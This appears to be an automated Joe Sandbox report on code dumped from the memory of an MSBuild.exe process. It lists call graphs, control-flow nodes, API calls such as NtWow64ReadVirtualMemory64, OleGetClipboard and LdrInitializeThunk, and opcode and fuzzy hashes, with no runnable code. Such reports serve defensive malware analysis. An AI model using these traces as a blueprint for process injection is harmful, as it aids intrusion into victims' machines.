OleGetClipboard 46713->46717 46714->46713 46715->46713 46716->46711 46717->46711 46719 5d0a7d1 46718->46719 46733 5d0a398 46719->46733 46723 5d0a7da 46722->46723 46724 5d0a398 OleInitialize 46722->46724 46723->46702 46724->46723 46727 5d0e0ed 46725->46727 46728 5d0e113 46727->46728 46740 5d0d590 46727->46740 46728->46703 46731 5d0e0ed 46729->46731 46730 5d0d590 OleGetClipboard 46730->46731 46731->46730 46732 5d0e113 46731->46732 46732->46703 46734 5d0a3a3 46733->46734 46735 5d0a7da 46734->46735 46737 5d0d478 46734->46737 46735->46702 46738 5d0dff8 OleInitialize 46737->46738 46739 5d0e07f 46738->46739 46739->46735 46741 5d0e180 OleGetClipboard 46740->46741 46743 5d0e24c 46741->46743 46168 11b8a10 46169 11b8a34 46168->46169 46170 11b8aa0 LdrInitializeThunk 46169->46170 46171 11b8ace 46170->46171 46188 63a0611 FreeLibrary 46189 11b9030 46190 11b9047 46189->46190 46193 11b8980 46190->46193 46194 11b899a 46193->46194 46195 11b899f KiUserExceptionDispatcher 46193->46195 46194->46195 46196 11b89e0 46195->46196 46197 11b89d6 46195->46197 46200 11b8db0 46196->46200 46204 11b8da0 46196->46204 46201 11b8dd4 46200->46201 46202 11b8e40 LdrInitializeThunk 46201->46202 46203 11b8e6e 46202->46203 46205 11b8dd4 46204->46205 46206 11b8e40 LdrInitializeThunk 46205->46206 46207 11b8e6e 46206->46207 46744 11b90c0 46745 11b90d7 46744->46745 46746 11b8980 3 API calls 46745->46746 46747 11b90f9 46746->46747 46748 11b88f0 46749 11b8907 46748->46749 46752 11b8980 3 API calls 46749->46752 46753 11b8970 46749->46753 46750 11b892a 46752->46750 46754 11b899a 46753->46754 46755 11b899f KiUserExceptionDispatcher 46753->46755 46754->46755 46756 11b89e0 46755->46756 46757 11b89d6 46755->46757 46758 11b8db0 LdrInitializeThunk 46756->46758 46759 11b8da0 LdrInitializeThunk 46756->46759 46757->46750 46758->46757 46759->46757

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 5c0a0a8-5c0a0b4 1 5c0a0b6-5c0a0e0 0->1 2 5c0a038-5c0a0a0 0->2 3 5c0a0e2 1->3 4 5c0a0e7-5c0a1f3 1->4 3->4 12 5c0a1f5-5c0a20a 4->12 13 5c0a20b 4->13 12->13 101 5c0a20b call 5c0abc2 13->101 102 5c0a20b call 5c0abb7 13->102 103 5c0a20b call 5c0a9c8 13->103 104 5c0a20b call 5c0a9b8 13->104 105 5c0a20b call 5c0abb9 13->105 15 5c0a211-5c0a244 16 5c0a254-5c0a274 15->16 17 5c0a246-5c0a253 15->17 19 5c0a276 16->19 20 5c0a27b-5c0a28c 16->20 17->16 19->20 21 5c0a293-5c0a7ef 20->21 22 5c0a28e 20->22 24 5c0a2b1-5c0a2bd 21->24 25 5c0a7f5-5c0a823 21->25 22->21 26 5c0a2c4-5c0a326 LdrInitializeThunk 24->26 27 5c0a2bf 24->27 31 5c0a32d-5c0a345 26->31 27->26 32 5c0a718-5c0a724 31->32 33 5c0a34a-5c0a356 32->33 34 5c0a72a-5c0a751 32->34 35 5c0a358 33->35 36 5c0a35d-5c0a3af 33->36 38 5c0a760 34->38 39 5c0a753-5c0a75f 34->39 35->36 44 5c0a3b1-5c0a3bd 36->44 45 5c0a3d9 36->45 42 5c0a761 38->42 39->38 42->42 46 5c0a3c7-5c0a3cd 44->46 47 5c0a3bf-5c0a3c5 44->47 48 5c0a3df-5c0a3f9 45->48 51 5c0a3d7 46->51 47->51 49 5c0a409-5c0a429 48->49 50 5c0a3fb-5c0a408 48->50 53 5c0a453 49->53 54 5c0a42b-5c0a437 49->54 50->49 51->48 57 5c0a459-5c0a473 53->57 55 5c0a441-5c0a447 54->55 56 5c0a439-5c0a43f 54->56 58 5c0a451 55->58 56->58 59 5c0a483-5c0a4a3 57->59 60 5c0a475-5c0a482 57->60 58->57 62 5c0a4a5-5c0a4b1 59->62 63 5c0a4cd 59->63 60->59 64 5c0a4b3-5c0a4b9 62->64 65 5c0a4bb-5c0a4c1 62->65 66 5c0a4d3-5c0a4ed 63->66 67 5c0a4cb 64->67 65->67 68 5c0a4fd-5c0a53d 66->68 69 5c0a4ef-5c0a4fc 66->69 67->66 71 5c0a56b-5c0a56f 68->71 72 5c0a53f-5c0a54c 68->72 69->68 75 5c0a571-5c0a58d 71->75 76 5c0a58f-5c0a591 71->76 73 5c0a55e-5c0a56a 72->73 74 5c0a54e-5c0a554 72->74 73->71 74->73 77 5c0a594-5c0a59f 75->77 76->77 79 5c0a5a1-5c0a611 77->79 80 5c0a612-5c0a624 77->80 79->80 83 5c0a651-5c0a653 80->83 84 5c0a626-5c0a638 80->84 85 5c0a656-5c0a661 83->85 84->83 90 5c0a63a-5c0a64f 84->90 88 5c0a663-5c0a678 85->88 89 5c0a67a-5c0a6dd 85->89 91 5c0a6df-5c0a6e6 88->91 89->91 90->85 93 5c0a6f5 91->93 94 5c0a6e8-5c0a6f4 91->94 93->32 94->93 101->15 102->15 103->15 104->15 105->15
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: $p$$p$$p$$p$$p$$p
                      • API String ID: 2994545307-3402276426
                      • Opcode ID: 6e89f1f4578ec418ece724fe1776e3ed7de02734fb7c64bd88efe5b6544b919f
                      • Instruction ID: 2e32edb4297b9483b415e07d77a4c0093b4f6c1d96184f643fae42c3727962e3
                      • Opcode Fuzzy Hash: 6e89f1f4578ec418ece724fe1776e3ed7de02734fb7c64bd88efe5b6544b919f
                      • Instruction Fuzzy Hash: 1D22D074E05328CFDB24DF65C984BADBBB2BF49304F1095EAD409AB290DB749A85CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1189 5c0b791-5c0b798 1190 5c0b7e0-5c0b7e1 1189->1190 1191 5c0b79a-5c0b7db 1189->1191 1192 5c0b7e3-5c0b7eb 1190->1192 1193 5c0b7ed-5c0b7f1 1190->1193 1191->1190 1194 5c0b7f6-5c0b7fb 1192->1194 1193->1194 1196 5c0b804-5c0b80d 1194->1196 1197 5c0b7fd-5c0b802 1194->1197 1198 5c0b810-5c0b812 1196->1198 1197->1198 1199 5c0b818-5c0b831 call 5c0b618 1198->1199 1200 5c0bb7e-5c0bba8 1198->1200 1204 5c0b833-5c0b843 1199->1204 1205 5c0b87f-5c0b886 1199->1205 1225 5c0bbaf-5c0bbef 1200->1225 1206 5c0bb16-5c0bb33 1204->1206 1207 5c0b849-5c0b861 1204->1207 1209 5c0b888 1205->1209 1210 5c0b88b-5c0b89b 1205->1210 1214 5c0bb3c-5c0bb45 1206->1214 1213 5c0b867-5c0b86e 1207->1213 1207->1214 1209->1210 1211 5c0b8ab-5c0b8c8 1210->1211 1212 5c0b89d-5c0b8a9 1210->1212 1215 5c0b8cc-5c0b8d8 1211->1215 1212->1215 1216 5c0b874-5c0b87e 1213->1216 1217 5c0bb4d-5c0bb77 1213->1217 1214->1217 1219 5c0b8da-5c0b8dc 1215->1219 1220 5c0b8de 1215->1220 1217->1200 1223 5c0b8e1-5c0b8e3 1219->1223 1220->1223 1224 5c0b8e9-5c0b8fe 1223->1224 1223->1225 1227 5c0b900-5c0b90c 1224->1227 1228 5c0b90e-5c0b92b 1224->1228 1259 5c0bbf6-5c0bc36 1225->1259 1230 5c0b92f-5c0b93b 1227->1230 1228->1230 1232 5c0b944-5c0b94d 1230->1232 1233 5c0b93d-5c0b942 1230->1233 1235 5c0b950-5c0b952 1232->1235 1233->1235 1237 5c0b958 1235->1237 1238 5c0b9da-5c0b9de 1235->1238 1310 5c0b95a call 5c0b791 1237->1310 1311 5c0b95a call 5c0bc98 1237->1311 1240 5c0b9e0-5c0b9fe 1238->1240 1241 5c0ba12-5c0ba2a call 5c0b4e0 1238->1241 1240->1241 1255 5c0ba00-5c0ba0d call 5c0b618 1240->1255 1258 5c0ba2f-5c0ba59 call 5c0b618 1241->1258 1242 5c0b960-5c0b980 call 5c0b618 1248 5c0b990-5c0b9ad 1242->1248 1249 5c0b982-5c0b98e 1242->1249 1253 5c0b9b1-5c0b9bd 1248->1253 1249->1253 1256 5c0b9c6-5c0b9cf 1253->1256 1257 5c0b9bf-5c0b9c4 1253->1257 1255->1204 1262 5c0b9d2-5c0b9d4 1256->1262 1257->1262 1268 5c0ba69-5c0ba86 1258->1268 1269 5c0ba5b-5c0ba67 1258->1269 1283 5c0bc3d-5c0bc8a 1259->1283 1262->1238 1262->1259 1271 5c0ba8a-5c0ba96 1268->1271 1269->1271 1272 5c0ba98-5c0ba9a 1271->1272 1273 5c0ba9c 1271->1273 1274 5c0ba9f-5c0baa1 1272->1274 1273->1274 1274->1204 1276 5c0baa7-5c0bab7 1274->1276 1277 5c0bac7-5c0bae4 1276->1277 1278 5c0bab9-5c0bac5 1276->1278 1280 5c0bae8-5c0baf4 1277->1280 1278->1280 1281 5c0baf6-5c0bafb 1280->1281 1282 5c0bafd-5c0bb06 1280->1282 1284 5c0bb09-5c0bb0b 1281->1284 1282->1284 1292 5c0bc8c-5c0bc94 1283->1292 1284->1283 1285 5c0bb11 1284->1285 1285->1199 1292->1292 1293 5c0bc96-5c0bcaf 1292->1293 1294 5c0bcb1-5c0bcc1 1293->1294 1295 5c0bcd9-5c0bce8 1293->1295 1296 5c0bcc3-5c0bcd8 1294->1296 1297 5c0bce9-5c0bd1f call 5c0b618 1294->1297 1301 5c0bd21-5c0bd26 1297->1301 1302 5c0bd27-5c0bd2e 1297->1302 1303 5c0bd30 1302->1303 1304 5c0bd33-5c0bd40 1302->1304 1303->1304 1306 5c0bd42 1304->1306 1307 5c0bd4e-5c0bd59 1304->1307 1308 5c0bd4a-5c0bd4d 1306->1308 1310->1242 1311->1242
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: Hp$Hp$Hp$Hp$Hp
                      • API String ID: 0-739616219
                      • Opcode ID: 46da84f8dac77075edf07d1e79902c06a0c646fc4e1f0697a19e5af0cf834416
                      • Instruction ID: 42b4c775afdefa0ec1ca41de3979b08185fd557a3b0e70df8143b88493e2cb1a
                      • Opcode Fuzzy Hash: 46da84f8dac77075edf07d1e79902c06a0c646fc4e1f0697a19e5af0cf834416
                      • Instruction Fuzzy Hash: 1E029F31A04256CFCB15DF75C0502BDFBB2BF85304F288A69D446AB291EB74AE85CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1312 5c08f60-5c08f8b 1313 5c08f92-5c08fca 1312->1313 1314 5c08f8d 1312->1314 1316 5c08fda-5c09012 1313->1316 1317 5c08fcc-5c08fd5 1313->1317 1314->1313 1321 5c09022-5c09052 call 5c0ac00 1316->1321 1322 5c09014-5c0901d 1316->1322 1318 5c09c84-5c09c90 1317->1318 1445 5c09054 call 5c0b328 1321->1445 1446 5c09054 call 5c0b238 1321->1446 1447 5c09054 call 5c0b229 1321->1447 1322->1318 1325 5c0905a-5c0906d 1326 5c09075-5c090fa 1325->1326 1327 5c0906f-5c09070 1325->1327 1362 5c09104-5c0910a 1326->1362 1328 5c09115-5c0913b 1327->1328 1329 5c09154-5c09228 1328->1329 1330 5c0913d-5c0914f 1328->1330 1332 5c0922e-5c09289 1329->1332 1330->1332 1336 5c092a8-5c0937e 1332->1336 1337 5c0928b-5c092a3 1332->1337 1340 5c09384-5c093a7 1336->1340 1337->1340 1440 5c093aa call 5bc2e8b 1340->1440 1441 5c093aa call 5bc2f64 1340->1441 1442 5c093aa call 5bc2c80 1340->1442 1443 5c093aa call 5bc2c70 1340->1443 1344 5c093ac-5c093d1 1347 5c093d7-5c093f6 1344->1347 1348 5c0977c-5c0979a 1344->1348 1350 5c09415-5c0951e 1347->1350 1351 5c093f8-5c09410 1347->1351 1352 5c097a0-5c097ce 1348->1352 1355 5c09524-5c09574 1350->1355 1351->1355 1364 5c097d4-5c097dc 1352->1364 1365 5c09c79-5c09c82 1352->1365 1359 5c09576-5c095b2 1355->1359 1360 5c095b7-5c096f5 1355->1360 1366 5c096fb-5c0974a 1359->1366 1360->1366 1362->1328 1369 5c097e4-5c0986c 1364->1369 1370 5c097de-5c097df 1364->1370 1365->1318 1380 5c0974f-5c0977a 1366->1380 1374 5c09877-5c098af 1369->1374 1370->1374 1378 5c098b1-5c098c9 1374->1378 1379 5c098ce-5c099c8 1374->1379 1383 5c099ce-5c09a12 1378->1383 1379->1383 1380->1352 1388 5c09a14-5c09a44 1383->1388 1389 5c09a49-5c09b5b 1383->1389 1391 5c09b61-5c09c5c 1388->1391 1389->1391 1448 5c09c5e call 5d005f8 1391->1448 1449 5c09c5e call 5d005e8 1391->1449 1438 5c09c64-5c09c77 1438->1318 1440->1344 1441->1344 1442->1344 1443->1344 1445->1325 1446->1325 1447->1325 1448->1438 1449->1438
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: #$S$T$$p
                      • API String ID: 0-1586711794
                      • Opcode ID: 37843d5fdbaa6db6d5d707a2947359f93f645a55d7f7a0fe0d2b22b85a808974
                      • Instruction ID: 5134d5e1dcb657e33936439bd7efcd61c8e41fc214dc302ec083355b68b4fff1
                      • Opcode Fuzzy Hash: 37843d5fdbaa6db6d5d707a2947359f93f645a55d7f7a0fe0d2b22b85a808974
                      • Instruction Fuzzy Hash: E1827E74A012288FDB65DF69C995BDDBBB2BB48304F1081EAD80DA7355DB35AE81CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1450 5c07160-5c0717a 1451 5c071a7-5c07208 1450->1451 1452 5c0717c-5c07186 1450->1452 1459 5c0720a 1451->1459 1460 5c0720f-5c0728c 1451->1460 1506 5c07189 call 5c088a0 1452->1506 1507 5c07189 call 5c08739 1452->1507 1453 5c0718f-5c07197 1455 5c071a0-5c071a6 1453->1455 1459->1460 1462 5c07298 1460->1462 1463 5c0728e-5c07296 1460->1463 1464 5c0729f-5c07337 LdrInitializeThunk 1462->1464 1463->1464 1469 5c07375-5c0738c 1464->1469 1470 5c07339-5c07374 1464->1470 1472 5c07391-5c07399 1469->1472 1473 5c0738e-5c0738f 1469->1473 1470->1469 1475 5c0739a-5c0739e 1472->1475 1473->1475 1478 5c073a0-5c073a1 1475->1478 1479 5c073a3-5c073ab 1475->1479 1480 5c073ac-5c073c8 1478->1480 1479->1480 1483 5c073d7-5c0741a LdrInitializeThunk 1480->1483 1484 5c073ca-5c073d2 1480->1484 1487 5c07421-5c0746d 1483->1487 1485 5c07512-5c0751a 1484->1485 1490 5c074ab-5c074c2 1487->1490 1491 5c0746f-5c074aa 1487->1491 1493 5c074c4-5c074c5 1490->1493 1494 5c074c7-5c074cf 1490->1494 1491->1490 1496 5c074d0-5c074d4 1493->1496 1494->1496 1498 5c074d6-5c074d7 1496->1498 1499 5c074d9-5c074e1 1496->1499 1501 5c074e2-5c074fe 1498->1501 1499->1501 1504 5c07500-5c07508 1501->1504 1505 5c0750a-5c07510 1501->1505 1504->1485 1505->1485 1506->1453 1507->1453
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: (p
                      • API String ID: 2994545307-4175582459
                      • Opcode ID: 2939fdbc4ec674b71da345e866ffae106c8092fda67ee02dc782a36c963a9264
                      • Instruction ID: c60ad5dc8cb202daf58dab9f38d86c9bf51de20313cc50a6eb427bc8ae89d5dc
                      • Opcode Fuzzy Hash: 2939fdbc4ec674b71da345e866ffae106c8092fda67ee02dc782a36c963a9264
                      • Instruction Fuzzy Hash: 53C1D374E05219CFDB58DFAAC8846EDBBF2FF89304F20956AD409AB294DB346945CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1553 11b4f40-11b4f70 1554 11b4f72 1553->1554 1555 11b4f77-11b5012 1553->1555 1554->1555 1562 11b5289-11b5292 1555->1562 1563 11b5298-11b52bc 1562->1563 1564 11b5017-11b5020 1562->1564 1565 11b5022 1564->1565 1566 11b5027-11b507e 1564->1566 1565->1566 1574 11b5080-11b5082 1566->1574 1575 11b5087-11b50bc 1566->1575 1576 11b5286 1574->1576 1579 11b519f-11b51bd 1575->1579 1580 11b50c2-11b517c 1575->1580 1576->1562 1583 11b51c3-11b5284 1579->1583 1584 11b5285 1579->1584 1597 11b5187-11b519a 1580->1597 1583->1584 1584->1576 1597->1584
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: `p$`p$kQ
                      • API String ID: 0-2978639466
                      • Opcode ID: 8aaaf5fa278149e0f9005aaeb75252125a2230e912a71f8d0725ae4cb0b5c6b0
                      • Instruction ID: 6c4f2bd322de9d0103188185a74775630f754ed9fdf17f252df18d88fd8cbb6a
                      • Opcode Fuzzy Hash: 8aaaf5fa278149e0f9005aaeb75252125a2230e912a71f8d0725ae4cb0b5c6b0
                      • Instruction Fuzzy Hash: 58B1E674E01219CFDB58DFA9C990AADBBF2FF89300F1485A9D409AB354DB35A942CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1764 5c06868-5c06870 1765 5c06880-5c068a7 1764->1765 1766 5c06872-5c06874 1764->1766 1768 5c068af-5c0691b 1765->1768 1767 5c06876-5c0687f 1766->1767 1766->1768 1777 5c06922-5c069bb 1768->1777 1778 5c0691d 1768->1778 1875 5c069c1 call 5c07150 1777->1875 1876 5c069c1 call 5c07160 1777->1876 1778->1777 1781 5c069c7-5c069ed 1782 5c06a15-5c06a57 1781->1782 1783 5c069ef-5c06a10 1781->1783 1788 5c06a59-5c06a7a 1782->1788 1789 5c06a7f-5c06aa9 1782->1789 1786 5c070ed-5c070f9 1783->1786 1788->1786 1792 5c06fb3-5c06fbf 1789->1792 1793 5c06fc5-5c0700e 1792->1793 1794 5c06aae-5c06aba 1792->1794 1805 5c0707b-5c07095 1793->1805 1795 5c06ac1-5c06b0f 1794->1795 1796 5c06abc 1794->1796 1801 5c06b11-5c06b13 1795->1801 1802 5c06b18-5c06b61 1795->1802 1796->1795 1804 5c06fb0 1801->1804 1812 5c06b63-5c06b65 1802->1812 1813 5c06b6a-5c06b84 1802->1813 1804->1792 1808 5c07010-5c07062 1805->1808 1809 5c0709b-5c070bf 1805->1809 1821 5c07064-5c07079 1808->1821 1822 5c0707a 1808->1822 1809->1786 1812->1804 1818 5c06b8a-5c06baa 1813->1818 1819 5c06c1f-5c06c21 1813->1819 1818->1819 1827 5c06bac-5c06c1d 1818->1827 1820 5c06c27-5c06c35 1819->1820 1823 5c06d80-5c06da0 1820->1823 1824 5c06c3b-5c06c89 1820->1824 1821->1822 1822->1805 1831 5c06da6-5c06dc6 1823->1831 1832 5c06e3b-5c06e3d 1823->1832 1835 5c06d44-5c06d79 1824->1835 1827->1820 1831->1832 1840 5c06dc8-5c06e39 1831->1840 1834 5c06e43-5c06e51 1832->1834 1837 5c06e57-5c06ea5 1834->1837 1838 5c06f9c-5c06faf 1834->1838 1846 5c06c8e-5c06cd4 1835->1846 1847 5c06d7f 1835->1847 1850 5c06f60-5c06f95 1837->1850 1838->1804 1840->1834 1858 5c06cd6-5c06cd8 1846->1858 1859 5c06cda-5c06d40 1846->1859 1847->1823 1856 5c06eaa-5c06ef0 1850->1856 1857 5c06f9b 1850->1857 1866 5c06ef2-5c06ef4 1856->1866 1867 5c06ef6-5c06f5c 1856->1867 1857->1838 1861 5c06d41 1858->1861 1859->1861 1861->1835 1869 5c06f5d 1866->1869 1867->1869 1869->1850 1875->1781 1876->1781
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: (p$(p
                      • API String ID: 0-216383650
                      • Opcode ID: ae5789b6d6f736c382f0a756c32ddb1cc744615470dccd3ef20d7fd8936589f9
                      • Instruction ID: 1e4c5a6fbce86dab79df96368720deda8aed89bae99e1af498742dca74726684
                      • Opcode Fuzzy Hash: ae5789b6d6f736c382f0a756c32ddb1cc744615470dccd3ef20d7fd8936589f9
                      • Instruction Fuzzy Hash: A232CD74D01229CFCB28DF65C984BEDBBB2BB89301F1095E9D409A7294EB359AC5CF50
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 16ff7ecacae3d35bc40cc1ef675e7d040f5e1b22ad1496c53e7cae66ae77c5a1
                      • Instruction ID: 621ca8ff338e0dad7d363864ac246032dcded995a44a691856439402e5f7f22b
                      • Opcode Fuzzy Hash: 16ff7ecacae3d35bc40cc1ef675e7d040f5e1b22ad1496c53e7cae66ae77c5a1
                      • Instruction Fuzzy Hash: AFF1C174D05228CFDB24DFA5C884B9DBBB2BF89300F24D5AAD409A7395DB349A85CF50
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: fp
                      • API String ID: 0-3781980146
                      • Opcode ID: b1a193dbeb96ec26e859be93e44a49d7feee17e313ac5f881a0328f209ba38b9
                      • Instruction ID: ef6a6b445df352466009068caa9eae308e2da3cd05c216dd3a62bc78968e5258
                      • Opcode Fuzzy Hash: b1a193dbeb96ec26e859be93e44a49d7feee17e313ac5f881a0328f209ba38b9
                      • Instruction Fuzzy Hash: 6C42C2B4D01228CFDB29CFA5C984BDEBBF2BF48304F1085A9D509A7294DB759A85CF50
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: eb4b3499db245960b92a712cc003e7a49d0338044a40873dbc08b21e26170035
                      • Instruction ID: cf03a3eccb269b2543b0d16837ea67046ac93750d38f4f07b12d5c3b0bc61a50
                      • Opcode Fuzzy Hash: eb4b3499db245960b92a712cc003e7a49d0338044a40873dbc08b21e26170035
                      • Instruction Fuzzy Hash: B7C1C474E00218CFDB28DFAAC584B9DFBF2BF89304F249569D409AB295DB349985CF44
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 8bed3247cd9255ff856b6814f72501626e25756dd1fd469e4152df41ff0fe166
                      • Instruction ID: 1a13880e1acf1b7e1c089c304237c7782bf7bf8448d875f2389fe9c9abc8d8d3
                      • Opcode Fuzzy Hash: 8bed3247cd9255ff856b6814f72501626e25756dd1fd469e4152df41ff0fe166
                      • Instruction Fuzzy Hash: 86F13E70A00205DFDB1ADF64C499AAE7FB6FF89304F1484ADE5069B290DB35EC42CB94
                      APIs
                      • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 05C01523
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: Memory64ReadVirtualWow64
                      • String ID:
                      • API String ID: 3357887247-0
                      • Opcode ID: 57bf1aa89a25512ad08c8f42d0f4482f28f8cd72fa09b811ec23db019dd826c9
                      • Instruction ID: c86133900307bb9e88ab4f05f47ec37163d9a90f14662ac9c71841291a62ebce
                      • Opcode Fuzzy Hash: 57bf1aa89a25512ad08c8f42d0f4482f28f8cd72fa09b811ec23db019dd826c9
                      • Instruction Fuzzy Hash: 484168B9D002589FCF10CFA9D980A9EFBB1FB49310F24942AE919BB310D735A945CF64
                      APIs
                      • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 05C01523
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: Memory64ReadVirtualWow64
                      • String ID:
                      • API String ID: 3357887247-0
                      • Opcode ID: 633169cbc0b6dc78fe54b151dc1d97f5603359b4db2e88dc9d7078406669121d
                      • Instruction ID: fd812aaa9b0a0f75bf53d0d58c6676e38598604ede7afd40b9d692df4e344d11
                      • Opcode Fuzzy Hash: 633169cbc0b6dc78fe54b151dc1d97f5603359b4db2e88dc9d7078406669121d
                      • Instruction Fuzzy Hash: 804168B9D002589FCF10CFA9D980A9EFBB1FB49310F24942AE919BB310D335A945CF64
                      APIs
                      • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 05C0121C
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InformationProcess64QueryWow64
                      • String ID:
                      • API String ID: 1933981353-0
                      • Opcode ID: 8e775834d14257a2e9de48befb21e7ed4a804dd63f861257a69044871f779a0f
                      • Instruction ID: af2c25f778c9038776c16ebdd3b629601f1b872c96f6e6a0dcb4699bf8c9dc4f
                      • Opcode Fuzzy Hash: 8e775834d14257a2e9de48befb21e7ed4a804dd63f861257a69044871f779a0f
                      • Instruction Fuzzy Hash: F14166B9D052589FCB10CFA9D984ADEFBB1BB19310F14942AE818BB310D735A946CF64
                      APIs
                      • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 05C0121C
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InformationProcess64QueryWow64
                      • String ID:
                      • API String ID: 1933981353-0
                      • Opcode ID: ca58673e89e6360ed6125881de9fe0e9fabd67033339b434d981bb39cfd97887
                      • Instruction ID: dac3e4601996b0ce4e658b6581365dce124bb3d007008ab083a370984c7d9547
                      • Opcode Fuzzy Hash: ca58673e89e6360ed6125881de9fe0e9fabd67033339b434d981bb39cfd97887
                      • Instruction Fuzzy Hash: 944166B9D052589FCF10CFA9D984A9EFBB1BB09310F14A42AE818B7310D335A942CF64
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: fp
                      • API String ID: 0-3781980146
                      • Opcode ID: 1db388366e563649425206ed1dbb53eb02c53f1a0f38e3ce350d98494c6ba080
                      • Instruction ID: 8f410d9d9c36b6083911082382fcd93cfddac4a63507e6f1dbb65f1b0859e339
                      • Opcode Fuzzy Hash: 1db388366e563649425206ed1dbb53eb02c53f1a0f38e3ce350d98494c6ba080
                      • Instruction Fuzzy Hash: EFA1C5B4E01228CFEB29DF66D9557DEBBB2BF88304F1084A9D408A7394DB755A85CF40
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59f3b9b175ce6fd016d8be00e9c28da31cbb72ca7333caa4d9b05a3474baa16e
